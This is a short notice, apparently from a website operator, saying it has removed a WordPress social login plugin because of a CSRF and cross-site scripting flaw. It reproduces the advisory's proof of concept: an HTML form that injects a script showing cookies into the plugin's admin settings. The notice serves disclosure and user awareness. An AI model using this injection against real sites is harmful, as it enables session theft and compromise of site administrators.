CSRF/Cross-Site Scripting (XSS) Vulnerability in WordPress Social Login

I removed the WordPress Social Login to our website due to vulnerability. Proof of Concept The following proof of concept will cause an alert box with the any available cookies to be shown when visiting the plugin’s admin page, /wp-admin/admin.php?page=mo_openid_settings. Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=mo_openid_settings" method="POST">
<input type="hidden" name="option" value="mo_openid_enable_apps" />
<input type="hidden" name="mo_openid_login_widget_customize_text" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Read this article. https://www.pluginvulnerabilities.com/2019/04/01/csrf-cross-site-scripting-xss-vulnerability-in-social-login-social-sharing-by-miniorange-wordpress-social-login-facebook-google-twitter/ You can still login to our website using your existing account, retrieve a new password and it will be send to your email address on file. Be safe in the wild wild Internet.